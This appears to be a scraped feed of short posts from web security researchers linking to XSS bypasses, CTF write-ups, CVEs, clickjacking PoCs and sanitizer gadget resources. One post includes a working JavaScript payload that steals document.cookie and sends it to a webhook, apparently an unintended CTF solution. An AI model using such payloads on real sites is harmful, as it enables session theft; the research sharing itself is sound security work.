Here is a bypass fixed in DOMPurify 3.1.7. It works only if special settings are used. Notice why the comment is closed with "->". masatokinugawa.github.io/xss/dompurify_…

My HeroCTF #web challenges write-ups are now available! :D mizu.re/post/heroctf-v… Here's a short list of the topics covered 👇 - Express res.download - Chromium cache partitioning - Service Worker hijacking through the Cache API - Webpack DOM clobbering 1/2

x = open("/"); setTimeout(() => { x.history.pushState(1,1,"/cookie"); setTimeout(() => { x.location = "javascript:'zzz'"; setTimeout(() => { location = `webhook?${encodeURIComponent(x.document.cookie)}`; }, 500); }, 500); }, 500); (this wasn't intended)

Cross-Site POST Requests Without a Content-Type Header by Luke Jahnke nastystereo.com/security/cross… #BBRENewsletter85

Chrome Extension context isolation bypass. (reward: $10000) crbug.com/371011220

For this challenge, it was necessary to abuse a discrepancy between the DOM and the rendered page in Firefox's cache handling 💽 👉 bugzilla.mozilla.org/show_bug.cgi?i… This allows to shift iframe rendering from one to another leading to a sandbox bypass 🔥 👉 mizu.re/post/an-18-yea…

Here's a way to exploit `eval(name)` on Firefox without user interaction:

It's possible to do CSS exfiltration under default-src: 'self'. Learn how: salvatore-abello.github.io/posts/css-exfi…

NEW: A few months ago, we uncovered an authentication bypass in Web3Auth that could have led to full account takeover. In this deep dive, we break down how we found the issue and expose other authentication misconfigurations lurking in Web3. osec.io/blog/2025-07-0…

while waiting for the big article to come (soon), I share with you a small article concerning a small research which led to a simple CP-DoS on Nuxt Nuxt, show me your payload - a basic CP DoS resulting in CVE-2025-27415, good reading zhero-web-sec.github.io/research-and-t…

New Blogpost - We identified a vulnerability in Discourse where a misconfiguration in Rails send_file + Nginx's internal directive can expose database backups! projectdiscovery.io/blog/discourse… This issue isn't limited to Discourse. It can affect other Rails + Nginx apps with similar

In addition to this amazing discovery, there was another middleware bypass with the `__nextLocale` URL query that was fixed in 2024. I wrote a short article about this vuln CVE-2024-51479. gmo-cybersecurity.com/blog/another-n…

Blink: Intent to Deprecate and Remove: Remove auto-detection of ISO-2022-JP charset in HTML bit.ly/3FUL2Je

Today I used a technique that’s probably not widely known in the community. In what cases could code like this lead to a vulnerability? ->

Double-Clickjacking, or "press buttons on other sites without preconditions". After seeing and experimenting with this technique for a while, I cooked up a variation that combines many small tricks and ends up being quite convincing. Here's a flexible PoC: jorianwoltjer.com/blog/p/hacking…

For this year Google CTF I created yet another Postviewer challenge called Postviewer v5². The challenge featured a seemingly impossible race-condition. Client-side race-conditions are an under-researched problem and could yield amazing real world bugs! gist.github.com/terjanq/e66c28…

I'm happy to release a script gadgets wiki inspired by the work of Sebastian Lekies, koto, and Eduardo Vela in their Black Hat USA 2017 talk! 🔥 The goal is to provide quick access to gadgets that help bypass HTML sanitizers and CSPs 👇 gmsgadget.com 1/4

github.com/form-data/form… Why is this critical 🤔

Last year I found a XSS bug in Google IDX here's a detail writeup about it. Hope you will enjoy it's kinda lengthy :p Shoutouts to Matan Berson for finding the original bug in Gitlab and Sreeram KL Sivanesh Ashok for the required chains to complete the exploit. sudistark.github.io/2025/07/02/idx…

"AI Agents for Offsec with Zero False Positives" by Brendan Dolan-Gavitt, a journey on how we managed to get 0 FPs with XBOW. You can find the slides for his BH talk here: cdn.prod.website-files.com/686c11d5bee015…